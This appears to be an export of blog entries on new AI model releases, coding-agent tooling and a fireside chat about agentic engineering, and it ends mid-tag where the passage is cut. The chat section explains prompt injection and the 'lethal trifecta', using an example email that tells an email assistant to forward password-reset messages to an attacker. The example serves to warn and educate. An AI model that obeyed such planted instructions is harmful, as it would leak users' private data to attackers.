entry 9148 2026-03-17 19:39:17+00:00 GPT-5.4 mini and GPT-5.4 nano, which can describe 76,000 photos for $52 <p>OpenAI today: <a href="https://openai.com/index/introducing-gpt-5-4-mini-and-nano/">Introducing GPT‑5.4 mini and nano</a>. These models join GPT-5.4 which was released <a href="https://openai.com/index/introducing-gpt-5-4/">two weeks ago</a>.</p> <p>OpenAI's self-reported benchmarks show the new 5.4-nano out-performing their previous GPT-5 mini model when run at maximum reasoning effort. The new mini is also 2x faster than the previous mini.</p> <p>Here's how the pricing looks - all prices are per million tokens. <code>gpt-5.4-nano</code> is notably even cheaper than Google's Gemini 3.1 Flash-Lite:</p> <center><table> <thead> <tr> <th>Model</th> <th>Input</th> <th>Cached input</th> <th>Output</th> </tr> </thead> <tbody> <tr> <td>gpt-5.4</td> <td>$2.50</td> <td>$0.25</td> <td>$15.00</td> </tr> <tr> <td>gpt-5.4-mini</td> <td>$0.75</td> <td>$0.075</td> <td>$4.50</td> </tr> <tr> <td>gpt-5.4-nano</td> <td>$0.20</td> <td>$0.02</td> <td>$1.25</td> </tr> <tr><td colspan="4"><center>Other models for comparison</center></td></tr> <tr> <td>Claude Opus 4.6</td> <td>$5.00</td> <td>-</td> <td>$25.00</td> </tr> <tr> <td>Claude Sonnet 4.6</td> <td>$3.00</td> <td>-</td> <td>$15.00</td> </tr> <tr> <td>Gemini 3.1 Pro</td> <td>$2.00</td> <td>-</td> <td>$12.00</td> </tr> <tr> <td>Claude Haiku 4.5</td> <td>$1.00</td> <td>-</td> <td>$5.00</td> </tr> <tr> <td>Gemini 3.1 Flash-Lite</td> <td>$0.25</td> <td>-</td> <td>$1.50</td> </tr> </tbody> </table></center> <p>I used GPT-5.4 nano to generate a description of this photo I took at the <a href="https://www.niche-museums.com/118">John M. Mossman Lock Collection</a>:</p> <p><img src="https://static.simonwillison.net/static/2026/IMG_2324.jpeg" alt="Description below" style="max-width: 100%;" /></p> <pre><code>llm -m gpt-5.4-nano -a IMG_2324.jpeg 'describe image' </code></pre> <p>Here's the output:</p> <blockquote> <p>The image shows the interior of a museum gallery with a long display wall. White-painted brick walls are covered with many framed portraits arranged in neat rows. Below the portraits, there are multiple glass display cases with dark wooden frames and glass tops/fronts, containing various old historical objects and equipment. The room has a polished wooden floor, hanging ceiling light fixtures/cords, and a few visible pipes near the top of the wall. In the foreground, glass cases run along the length of the room, reflecting items from other sections of the gallery.</p> </blockquote> <p>That took 2,751 input tokens and 112 output tokens, at a cost of <a href="https://www.llm-prices.com/#it=2751&amp;ot=112&amp;sel=gpt-5.4-nano">0.069 cents</a> (less than a tenth of a cent). That means describing every single photo in my 76,000 photo collection would cost around $52.44.</p> <p>I released <a href="https://llm.datasette.io/en/stable/changelog.html#v0-29">llm 0.29</a> with support for the new models.</p> <p>Then I had OpenAI Codex loop through all five reasoning effort levels and all three models and produce this combined SVG grid of pelicans riding bicycles (<a href="https://gist.github.com/simonw/f16292d9a5b90b28054cff3ba497a3ca">generation transcripts here</a>). I do like the gpt-5.4 xhigh one the best, it has a good bicycle (with nice spokes) and the pelican has a fish in its beak!</p> <p><img src="https://static.simonwillison.net/static/2026/gpt-5.4-pelican-family.svg" alt="Described by Claude Opus 4.6: A 5x3 comparison grid of AI-generated cartoon illustrations of a pelican riding a bicycle. Columns are labeled &quot;gpt-5.4-nano&quot;, &quot;gpt-5.4-mini&quot;, and &quot;gpt-5.4&quot; across the top, and rows are labeled &quot;none&quot;, &quot;low&quot;, &quot;medium&quot;, &quot;high&quot;, and &quot;xhigh&quot; down the left side, representing quality/detail settings. In the &quot;none&quot; row, gpt-5.4-nano shows a chaotic white bird with misplaced arrows and tangled wheels on grass, gpt-5.4-mini shows a duck-like brown bird awkwardly straddling a motorcycle-like bike, and gpt-5.4 shows a stiff gray-and-white pelican sitting atop a blue tandem bicycle with extra legs. In the &quot;low&quot; row, nano shows a chubby round white bird pedaling with small feet on grass, mini shows a cleaner white bird riding a blue bicycle with motion lines, and gpt-5.4 shows a pelican with a blue cap riding confidently but with slightly awkward proportions. In the &quot;medium&quot; row, nano regresses to a strange bird standing over bowling balls on ice, mini shows two plump white birds merged onto one yellow-wheeled bicycle, and gpt-5.4 shows a more recognizable gray-and-white pelican on a red bicycle but with tangled extra legs. In the &quot;high&quot; row, nano shows multiple small pelicans crowded around a broken green bicycle on grass with a sun overhead, mini shows a tandem bicycle with two white pelicans and clear blue sky, and gpt-5.4 shows two pelicans stacked on a red tandem bike with the most realistic proportions yet. In the &quot;xhigh&quot; row, nano shows the most detailed scene with a pelican on a detailed bicycle with grass and a large sun but still somewhat jumbled anatomy, mini produces the cleanest single pelican on a yellow-accented bicycle with a light blue sky, and gpt-5.4 shows a well-rendered gray pelican on a teal bicycle with the best overall coherence. Generally, quality improves moving right across models and down through quality tiers, though &quot;medium&quot; is inconsistently worse than &quot;low&quot; for some models, and all images maintain a lighthearted cartoon style with pastel skies and simple backgrounds." style="max-width: 100%;" /></p>
quotation 2048 2026-03-17 16:13:37+00:00 If you do not understand the ticket, if you do not understand the solution, or if you do not understand the feedback on your PR, then your use of LLM is hurting Django as a whole. [...] For a reviewer, it’s demoralizing to communicate with a facade of a human. This is because contributing to open source, especially Django, is a communal endeavor. Removing your humanity from that experience makes that endeavor more difficult. If you use an LLM to contribute to Django, it needs to be as a complementary tool, not as your vehicle. - Tim Schilling
blogmark 9335 2026-03-16 23:41:17+00:00 Introducing Mistral Small 4 - Big new release from Mistral today (despite the name) - a new Apache 2 licensed 119B parameter (Mixture-of-Experts, 6B active) model which they describe like this: > Mistral Small 4 is the first Mistral model to unify the capabilities of our flagship models, Magistral for reasoning, Pixtral for multimodal, and Devstral for agentic coding, into a single, versatile model. It supports `reasoning_effort="none"` or `reasoning_effort="high"`, with the latter providing "equivalent verbosity to previous Magistral models". The new model is [242GB on Hugging Face](https://huggingface.co/mistralai/Mistral-Small-4-119B-2603/tree/main). I [tried it out](https://gist.github.com/simonw/3dec228577559f15f26204a3cc550583) via the Mistral API using [llm-mistral](https://github.com/simonw/llm-mistral): llm install llm-mistral llm mistral refresh llm -m mistral/mistral-small-2603 "Generate an SVG of a pelican riding a bicycle" ![The bicycle is upside down and mangled and the pelican is a series of grey curves with a triangular beak.](https://static.simonwillison.net/static/2026/mistral-small-4.png) I couldn't find a way to set the reasoning effort in their [API documentation](https://docs.mistral.ai/api/endpoint/chat#operation-chat_completion_v1_chat_completions_post), so hopefully that's a feature which will land soon. <em>**Update 23rd March**: Here's new documentation for the [reasoning_effort parameter](https://docs.mistral.ai/capabilities/reasoning/adjustable).</em> Also from Mistral today and fitting their -stral naming convention is [Leanstral](https://mistral.ai/news/leanstral), an open weight model that is specifically tuned to help output the [Lean 4](https://lean-lang.org/) formally verifiable coding language. I haven't explored Lean at all so I have no way to credibly evaluate this, but it's interesting to see them target one specific language in this way.
blogmark 9334 2026-03-16 23:03:56+00:00 Use subagents and custom agents in Codex - @OpenAIDevs Subagents were announced in general availability today for OpenAI Codex, after several weeks of preview behind a feature flag. They're very similar to the Claude Code implementation, with default subagents for "explorer", "worker" and "default". It's unclear to me what the difference between "worker" and "default" is but based on their CSV example I think "worker" is intended for running large numbers of small tasks in parallel. Codex also lets you define custom agents as TOML files in `~/.codex/agents/`. These can have custom instructions and be assigned to use specific models - including `gpt-5.3-codex-spark` if you want [some raw speed](https://simonwillison.net/2026/Feb/12/codex-spark/). They can then be referenced by name, as demonstrated by this example prompt from the documentation: > `Investigate why the settings modal fails to save. Have browser_debugger reproduce it, code_mapper trace the responsible code path, and ui_fixer implement the smallest fix once the failure mode is clear.` The subagents pattern is widely supported in coding agents now. Here's documentation across a number of different platforms: - [OpenAI Codex subagents](https://developers.openai.com/codex/subagents/) - [Claude Code subagents](https://code.claude.com/docs/en/sub-agents) - [Gemini CLI subagents](https://geminicli.com/docs/core/subagents/) (experimental) - [Mistral Vibe subagents](https://docs.mistral.ai/mistral-vibe/agents-skills#agent-selection) - [OpenCode agents](https://opencode.ai/docs/agents/) - [Subagents in Visual Studio Code](https://code.visualstudio.com/docs/copilot/agents/subagents) - [Cursor Subagents](https://cursor.com/docs/subagents) **Update**: I added [a chapter on Subagents](https://simonwillison.net/guides/agentic-engineering-patterns/subagents/) to my Agentic Engineering Patterns guide.
quotation 2047 2026-03-16 21:38:55+00:00 The point of [the blackmail exercise](https://simonwillison.net/2025/Jun/20/agentic-misalignment/) was to have something to describe to policymakers—results that are visceral enough to land with people, and make misalignment risk actually salient in practice for people who had never thought about it before. - A member of Anthropic’s alignment-science team
quotation 2046 2026-03-16 20:34:13+00:00 Tidbit: the software-based camera indicator light in the MacBook Neo runs in the secure exclave¹ part of the chip, so it is almost as secure as the hardware indicator light. What that means in practice is that even a kernel-level exploit would not be able to turn on the camera without the light appearing on screen. It runs in a privileged environment separate from the kernel and blits the light directly onto the screen hardware. - Guilherme Rambo
blogmark 9333 2026-03-16 20:12:32+00:00 Coding agents for data analysis - Here's the handout I prepared for my NICAR 2026 workshop "Coding agents for data analysis" - a three hour session aimed at data journalists demonstrating ways that tools like Claude Code and OpenAI Codex can be used to explore, analyze and clean data. Here's the table of contents: > - [Coding agents](https://simonw.github.io/nicar-2026-coding-agents/coding-agents.html) > - [Warmup: ChatGPT and Claude](https://simonw.github.io/nicar-2026-coding-agents/warmup.html) > - [Setup Claude Code and Codex](https://simonw.github.io/nicar-2026-coding-agents/setup.html) > - [Asking questions against a database](https://simonw.github.io/nicar-2026-coding-agents/asking-questions.html) > - [Exploring data with agents](https://simonw.github.io/nicar-2026-coding-agents/exploring-data.html) > - [Cleaning data: decoding neighborhood codes](https://simonw.github.io/nicar-2026-coding-agents/cleaning-trees.html) > - [Creating visualizations with agents](https://simonw.github.io/nicar-2026-coding-agents/visualizations.html) > - [Scraping data with agents](https://simonw.github.io/nicar-2026-coding-agents/scraping.html) I ran the workshop using GitHub Codespaces and OpenAI Codex, since it was easy (and inexpensive) to distribute a budget-restricted API key for Codex that attendees could use during the class. Participants ended up burning $23 of Codex tokens. The exercises all used Python and SQLite and some of them used Datasette. One highlight of the workshop was when we started [running Datasette](https://simonw.github.io/nicar-2026-coding-agents/visualizations.html#javascript-visualizations) such that it served static content from a `viz/` folder, then had Claude Code start vibe coding new interactive visualizations directly in that folder. Here's a heat map it created for my trees database using Leaflet and [Leaflet.heat](https://github.com/Leaflet/Leaflet.heat), [source code here](https://gist.github.com/simonw/985ae2a6a3cd3df3fd375eb58dabea0f). ![Screenshot of a "Trees SQL Map" web application with the heading "Trees SQL Map" and subheading "Run a query and render all returned points as a heat map. The default query targets roughly 200,000 trees." Below is an input field containing "/trees/-/query.json", a "Run Query" button, and a SQL query editor with the text "SELECT cast(Latitude AS float) AS latitude, cast(Longitude AS float) AS longitude, CASE WHEN DBH IS NULL OR DBH = '' THEN 0.3 WHEN cast(DBH AS float) <= 0 THEN 0.3 WHEN cast(DBH AS float) >= 80 THEN 1.0" (query is truncated). A status message reads "Loaded 1,000 rows and plotted 1,000 points as heat map." Below is a Leaflet/OpenStreetMap interactive map of San Francisco showing a heat map overlay of tree locations, with blue/green clusters concentrated in areas like the Richmond District, Sunset District, and other neighborhoods. Map includes zoom controls and a "Leaflet | © OpenStreetMap contributors" attribution.](https://static.simonwillison.net/static/2026/tree-sql-map.jpg) I designed the handout to also be useful for people who weren't able to attend the session in person. As is usually the case, material aimed at data journalists is equally applicable to anyone else with data to explore.
quotation 2045 2026-03-14 18:41:25+00:00 GitHub’s [slopocalypse](https://www.theregister.com/2026/02/18/godot_maintainers_struggle_with_draining/) – the flood of AI-generated spam PRs and issues – has made Jazzband’s model of open membership and shared push access untenable. Jazzband was designed for a world where the worst case was someone accidentally merging the wrong PR. In a world where [only 1 in 10 AI-generated PRs meets project standards](https://www.devclass.com/ai-ml/2026/02/19/github-itself-to-blame-for-ai-slop-prs-say-devs/4091420), where curl had to [shut down its bug bounty](https://daniel.haxx.se/blog/2026/01/26/the-end-of-the-curl-bug-bounty/) because confirmation rates dropped below 5%, and where GitHub’s own response was a [kill switch to disable pull requests entirely](https://www.theregister.com/2026/02/03/github_kill_switch_pull_requests_ai) – an organization that gives push access to everyone who joins simply can’t operate safely anymore. - Jannis Leidel
entry 9147 2026-03-14 18:19:38+00:00 My fireside chat about agentic engineering at the Pragmatic Summit <p>I was a speaker last month at the <a href="https://www.pragmaticsummit.com/">Pragmatic Summit</a> in San Francisco, where I participated in a fireside chat session about <a href="https://simonwillison.net/guides/agentic-engineering-patterns/">Agentic Engineering</a> hosted by Eric Lui from Statsig.</p> <p>The video is <a href="https://www.youtube.com/watch?v=owmJyKVu5f8">available on YouTube</a>. Here are my highlights from the conversation.</p> <iframe style="margin-top: 1.5em; margin-bottom: 1.5em;" width="560" height="315" src="https://www.youtube-nocookie.com/embed/owmJyKVu5f8" title="Simon Willison: Engineering practices that make coding agents work - The Pragmatic Summit" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen="allowfullscreen"> </iframe> <h4 id="stages-of-ai-adoption">Stages of AI adoption</h4> <p>We started by talking about the different phases a software developer goes through in adopting AI coding tools.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=165s">02:45</a></p> <blockquote> <p>I feel like there are different stages of AI adoption as a programmer. You start off with you've got ChatGPT and you ask it questions and occasionally it helps you out. And then the big step is when you move to the coding agents that are writing code for you—initially writing bits of code and then there's that moment where the agent writes more code than you do, which is a big moment. And that for me happened only about maybe six months ago.</p> </blockquote> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=222s">03:42</a></p> <blockquote> <p>The new thing as of what, three weeks ago, is you don't read the code. If anyone saw StrongDM—they had a big thing come out last week where they talked about their software factory and their two principles were nobody writes any code, nobody reads any code, which is clear insanity. That is wildly irresponsible. They're a security company building security software, which is why it's worth paying close attention—like how could this possibly be working?</p> </blockquote> <p>I talked about StrongDM more in <a href="https://simonwillison.net/2026/Feb/7/software-factory/">How StrongDM's AI team build serious software without even looking at the code</a>.</p> <h4 id="trusting-ai-output">Trusting AI output</h4> <p>We discussed the challenge of knowing when to trust the AI's output as opposed to reviewing every line with a fine tooth-comb.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=262s">04:22</a></p> <blockquote> <p>The way I've become a little bit more comfortable with it is thinking about how when I worked at a big company, other teams would build services for us and we would read their documentation, use their service, and we wouldn't go and look at their code. If it broke, we'd dive in and see what the bug was in the code. But you generally trust those teams of professionals to produce stuff that works. Trusting an AI in the same way feels very uncomfortable. I think Opus 4.5 was the first one that earned my trust—I'm very confident now that for classes of problems that I've seen it tackle before, it's not going to do anything stupid. If I ask it to build a JSON API that hits this database and returns the data and paginates it, it's just going to do it and I'm going to get the right thing back.</p> </blockquote> <h4 id="test-driven-development-with-agents">Test-driven development with agents</h4> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=373s">06:13</a></p> <blockquote> <p>Every single coding session I start with an agent, I start by saying here's how to run the test—it's normally <code>uv run pytest</code> is my current test framework. So I say run the test and then I say use red-green TDD and give it its instruction. So it's "use red-green TDD"—it's like five tokens, and that works. All of the good coding agents know what red-green TDD is and they will start churning through and the chances of you getting code that works go up so much if they're writing the test first.</p> </blockquote> <p>I wrote more about TDD for coding agents recently in <a href="https://simonwillison.net/guides/agentic-engineering-patterns/red-green-tdd/">Red/green TDD</a>.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=340s">05:40</a></p> <blockquote> <p>I have hated [test-first TDD] throughout my career. I've tried it in the past. It feels really tedious. It slows me down. I just wasn't a fan. Getting agents to do it is fine. I don't care if the agent spins around for a few minutes wasting its time on a test that doesn't work.</p> </blockquote> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=401s">06:41</a></p> <blockquote> <p>I see people who are writing code with coding agents and they're not writing any tests at all. That's a terrible idea. Tests—the reason not to write tests in the past has been that it's extra work that you have to do and maybe you'll have to maintain them in the future. They're free now. They're effectively free. I think tests are no longer even remotely optional.</p> </blockquote> <h4 id="manual-testing-and-showboat">Manual testing and Showboat</h4> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=426s">07:06</a></p> <blockquote> <p>You have to get them to test the stuff manually, which doesn't make sense because they're computers. But anyone who's done automated tests will know that just because the test suite passes doesn't mean that the web server will boot. So I will tell my agents, start the server running in the background and then use curl to exercise the API that you just created. And that works, and often that will find new bugs that the test didn't cover.</p> </blockquote> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=462s">07:42</a></p> <blockquote> <p>I've got this new tool I built called Showboat. The idea with Showboat is you tell it—it's a little thing that builds up a markdown document of the manual test that it ran. So you can say go and use Showboat and exercise this API and you'll get a document that says "I'm trying out this API," curl command, output of curl command, "that works, let's try this other thing."</p> </blockquote> <p>I introduced Showboat in <a href="https://simonwillison.net/2026/Feb/10/showboat-and-rodney/">Introducing Showboat and Rodney, so agents can demo what they've built</a>.</p> <h4 id="conformance-driven-development">Conformance-driven development</h4> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=534s">08:54</a></p> <blockquote> <p>I had a project recently where I wanted to add file uploads to my own little web framework, Datasette—multipart file uploads and all of that. And the way I did it is I told Claude to build a test suite for file uploads that passes on Go and Node.js and Django and Starlette—just here's six different web frameworks that implement this, build tests that they all pass. Now I've got a test suite and I can say, okay, build me a new implementation for Datasette on top of those tests. And it did the job. It's really powerful—it's almost like you can reverse engineer six implementations of a standard to get a new standard and then you can implement the standard.</p> </blockquote> <p>Here's <a href="https://github.com/simonw/datasette/pull/2626">the PR</a> for that file upload feature, and the <a href="https://github.com/simonw/multipart-form-data-conformance">multipart-form-data-conformance</a> test suite I developed for it.</p> <h4 id="does-code-quality-matter">Does code quality matter?</h4> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=604s">10:04</a></p> <blockquote> <p>It's completely context dependent. I knock out little vibe-coded HTML JavaScript tools, single pages, and the code quality does not matter. It's like 800 lines of complete spaghetti. Who cares, right? It either works or it doesn't. Anything that you're maintaining over the longer term, the code quality does start really mattering.</p> </blockquote> <p>Here's <a href="https://tools.simonwillison.net/">my collection of vibe coded HTML tools</a>, and <a href="https://simonwillison.net/2025/Dec/10/html-tools/">notes on how I build them</a>.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=627s">10:27</a></p> <blockquote> <p>Having poor quality code from an agent is a choice that you make. If the agent spits out 2,000 lines of bad code and you choose to ignore it, that's on you. If you then look at that code—you know what, we should refactor that piece, use this other design pattern—and you feed that back into the agent, you can end up with code that is way better than the code I would have written by hand because I'm a little bit lazy. If there was a little refactoring I spot at the very end that would take me another hour, I'm just not going to do it. If an agent's going to take an hour but I prompt it and then go off and walk the dog, then sure, I'll do it.</p> </blockquote> <p>I turned this point into a bit of a personal manifesto: <a href="https://simonwillison.net/guides/agentic-engineering-patterns/better-code/">AI should help us produce better code</a>.</p> <h4 id="codebase-patterns-and-templates">Codebase patterns and templates</h4> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=692s">11:32</a></p> <blockquote> <p>One of the magic tricks about these things is they're incredibly consistent. If you've got a codebase with a bunch of patterns in, they will follow those patterns almost to a tee.</p> </blockquote> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=715s">11:55</a></p> <blockquote> <p>Most of the projects I do I start by cloning that template. It puts the tests in the right place and there's a readme with a few lines of description in it and GitHub continuous integration is set up. Even having just one or two tests in the style that you like means it'll write tests in the style that you like. There's a lot to be said for keeping your codebase high quality because the agent will then add to it in a high quality way. And honestly, it's exactly the same with human development teams—if you're the first person to use Redis at your company, you have to do it perfectly because the next person will copy and paste what you did.</p> </blockquote> <p>I run templates using <a href="https://cookiecutter.readthedocs.io/">cookiecutter</a> - here are my templates for <a href="https://github.com/simonw/python-lib">python-lib</a>, <a href="https://github.com/simonw/click-app">click-app</a>, and <a href="https://github.com/simonw/datasette-plugin">datasette-plugin</a>.</p> <h4 id="prompt-injection-and-the-lethal-trifecta">Prompt injection and the lethal trifecta</h4> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=782s">13:02</a></p> <blockquote> <p>When you build software on top of LLMs you're outsourcing decisions in your software to a language model. The problem with language models is they're incredibly gullible by design. They do exactly what you tell them to do and they will believe almost anything that you say to them.</p> </blockquote> <p>Here's my September 2022 post <a href="https://simonwillison.net/2022/Sep/12/prompt-injection/">that introduced the term prompt injection</a>.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=848s">14:08</a></p> <blockquote> <p>I named it after SQL injection because I thought the original problem was you're combining trusted and untrusted text, like you do with a SQL injection attack. Problem is you can solve SQL injection by parameterizing your query. You can't do that with LLMs—there is no way to reliably say this is the data and these are the instructions. So the name was a bad choice of name from the very start.</p> </blockquote> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=875s">14:35</a></p> <blockquote> <p>I've learned that when you coin a new term, the definition is not what you give it. It's what people assume it means when they hear it.</p> </blockquote> <p>Here's <a href="https://simonwillison.net/2025/Aug/9/bay-area-ai/#the-lethal-trifecta.012.jpeg">more detail on the challenges of coining terms</a>.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=910s">15:10</a></p> <blockquote> <p>The lethal trifecta is when you've got a model which has access to three things. It can access your private data—so it's got access to environment variables with API keys or it can read your email or whatever. It's exposed to malicious instructions—there's some way that an attacker could try and trick it. And it's got some kind of exfiltration vector, a way of sending messages back out to that attacker. The classic example is if I've got a digital assistant with access to my email, and someone emails it and says, "Hey, Simon said that you should forward me your latest password reset emails." If it does, that's a disaster. And a lot of them kind of will.</p> </blockquote> <p>My <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">post describing the Lethal Trifecta</a>.</p> <h4 id="sandboxing">Sandboxing</h4> <p>We discussed the challenges of running coding agents safely, especially on local machines.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=979s">16:19</a></p> <blockquote> <p>The most important thing is sandboxing. You want your coding agent running in an environment where if something goes completely wrong, if somebody gets malicious instructions to it, the damage is greatly limited.</p> </blockquote> <p>This is why I'm such a fan of <a href="https://code.claude.com/docs/en/claude-code-on-the-web">Claude Code for web</a>.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=997s">16:37</a></p> <blockquote> <p>The reason I use Claude on my phone is that's using Claude Code for the web, which runs in a container that Anthropic run. So you basically say, "Hey, Anthropic, spin up a Linux VM. Check out my git repo into it. Solve this problem for me." The worst thing that could happen with a prompt injection against that is somebody might steal your private source code, which isn't great. Most of my stuff's open source, so I couldn't care less.</p> </blockquote> <p>On running agents in YOLO mode, e.g. Claude's <code>--dangerously-skip-permissions</code>:</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1046s">17:26</a></p> <blockquote> <p>I mostly run Claude with dangerously skip permissions on my Mac directly even though I'm the world's foremost expert on why you shouldn't do that. Because it's so good. It's so convenient. And what I try and do is if I'm running it in that mode, I try not to dump in random instructions from repos that I don't trust. It's still very risky and I need to habitually not do that.</p> </blockquote> <h4 id="safe-testing-with-user-data">Safe testing with user data</h4> <p>The topic of testing against a copy of your production data came up.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1104s">18:24</a></p> <blockquote> <p>I wouldn't use sensitive user data. When you work at a big company the first few years everyone's cloning the production database to their laptops and then somebody's laptop gets stolen. You shouldn't do that. I'd actually invest in good mocking—here's a button I click and it creates a hundred random users with made-up names. There's a trick you can do there which is much easier with agents where you can say, okay, there's this one edge case where if a user has over a thousand ticket types in my event platform everything breaks, so I have a button that you click that creates a simulated user with a thousand ticket types.</p> </blockquote> <h4 id="how-we-got-here">How we got here</h4> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1183s">19:43</a></p> <blockquote> <p>I feel like there have been a few inflection points. GPT-4 was the point where it was actually useful and it wasn't making up absolutely everything and then we were stuck with GPT-4 for about 9 months—nobody else could build a model that good.</p> </blockquote> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1204s">20:04</a></p> <blockquote> <p>I think the killer moment was Claude Code. The coding agents only kicked off about a year ago. Claude Code just turned one year old. It was that combination of Claude Code plus Sonnet 3.5 at the time—that was the first model that really felt good enough at driving a terminal to be able to do useful things.</p> </blockquote> <p>Then things got <em>really good</em> with the <a href="https://simonwillison.net/tags/november-2025-inflection/">November 2025 inflection point</a>.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1255s">20:55</a></p> <blockquote> <p>It's at a point where I'm oneshotting basically everything. I'll pull out and say, "Oh, I need three new RSS feeds on my blog." And I don't even have to ask if it's going to work. It's like a two sentence prompt. That reliability, that ability to predictably—this is why we can start trusting them because we can predict what they're going to do.</p> </blockquote> <h4 id="exploring-model-boundaries">Exploring model boundaries</h4> <p>An ongoing challenge is figuring out what the models can and cannot do, especially as new models are released.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1298s">21:38</a></p> <blockquote> <p>The most interesting question is what can the models we have do right now. The only thing I care about today is what can Claude Opus 4.6 do that we haven't figured out yet. And I think it would take us six months to even start exploring the boundaries of that.</p> </blockquote> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1311s">21:51</a></p> <blockquote> <p>It's always useful—anytime a model fails to do something for you, tuck that away and try again in 6 months because it'll normally fail again, but every now and then it'll actually do it and now you might be the first person in the world to learn that the model can now do this thing.</p> </blockquote> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1328s">22:08</a></p> <blockquote> <p>A great example is spellchecking. A year and a half ago the models were terrible at spellchecking—they couldn't do it. You'd throw stuff in and they just weren't strong enough to spot even minor typos. That changed about 12 months ago and now every blog post I post I have a proofreader Claude thing and I paste it and it goes, "Oh, you've misspelled this, you've missed an apostrophe off here." It's really useful.</p> </blockquote> <p>Here's <a href="https://simonwillison.net/guides/agentic-engineering-patterns/prompts/#proofreader">the prompt I use</a> for proofreading.</p> <h4 id="mental-exhaustion-and-career-advice">Mental exhaustion and career advice</h4> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1409s">23:29</a></p> <blockquote> <p>This stuff is absolutely exhausting. I often have three projects that I'm working on at once because then if something takes 10 minutes I can switch to another one and after two hours of that I'm done for the day. I'm mentally exhausted. People worry about skill atrophy and being lazy. I think this is the opposite of that. You have to operate firing on all cylinders if you're going to keep your trio or quadruple of agents busy solving all these different problems.</p> </blockquote> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1441s">24:01</a></p> <blockquote> <p>I think that might be what saves us. You can't have one engineer and have him do a thousand projects because after 3 hours of that, he's going to literally pass out in a corner.</p> </blockquote> <p>I was asked for general career advice for software developers in this new era of agentic engineering.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1456s">24:16</a></p> <blockquote> <p>As engineers, our careers should be changing right now this second because we can be so much more ambitious in what we do. If you've always stuck to two programming languages because of the overhead of learning a third, go and learn a third right now—and don't learn it, just start writing code in it. I've released three projects written in Go in the past two weeks and I am not a fluent Go programmer, but I can read it well enough to scan through and go, "Yeah, this looks like it's doing the right thing."</p> </blockquote> <p>It's a great idea to try fun, weird, or stupid projects with them too:</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1503s">25:03</a></p> <blockquote> <p>I needed to cook two meals at once at Christmas from two recipes. So I took photos of the two recipes and I had Claude vibe code me up a cooking timer uniquely for those two recipes. You click go and it says, "Okay, in recipe one you need to be doing this and then in recipe two you do this." And it worked. I mean it was stupid, right? I should have just figured it out with a piece of paper. It would have been fine. But it's so much more fun building a ridiculous custom piece of software to help you cook Christmas dinner.</p> </blockquote> <p>Here's <a href="https://simonwillison.net/2025/Dec/23/cooking-with-claude/">more about that recipe app</a>.</p> <h4 id="what-does-this-mean-for-open-source">What does this mean for open source?</h4> <p>Eric asked if we would build Django the same way today as we did <a href="https://simonwillison.net/2005/Jul/17/django/">22 years ago</a>.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1562s">26:02</a></p> <blockquote> <p>In 2003 we built Django. I co-created it at a local newspaper in Kansas and it was because we wanted to build web applications on journalism deadlines. There's a story, you want to knock out a thing related to that story, it can't take two weeks because the story's moved on. You've got to have tools in place that let you build things in a couple of hours. And so the whole point of Django from the very start was how do we help people build high-quality applications as quickly as possible. Today, I can build an app for a news story in two hours and it doesn't matter what the code looks like.</p> </blockquote> <p>I talked about the challenges that AI-assisted programming poses for open source in general.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1608s">26:48</a></p> <blockquote> <p>Why would I use a date picker library where I'd have to customize it when I could have Claude write me the exact date picker that I want? I would trust Opus 4.6 to build me a good date picker widget that was mobile friendly and accessible and all of those things. And what does that do for demand for open source? We've seen that thing with Tailwind, right? Where Tailwind's business model is the framework's free and then you pay them for access to their component library of high quality date pickers, and the market for that has collapsed because people can vibe code those kinds of custom components.</p> </blockquote> <p>Here are <a href="https://simonwillison.net/2026/Jan/11/answers/#does-this-format-of-development-hurt-the-open-source-ecosystem">more of my thoughts</a> on the Tailwind situation.</p> <p><a href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1657s">27:37</a></p> <blockquote> <p>I don't know. Agents love open source. They're great at recommending libraries. They will stitch things together. I feel like the reason you can build such amazing things with agents is entirely built on the back of the open source community.</p> </blockquote> <p><a 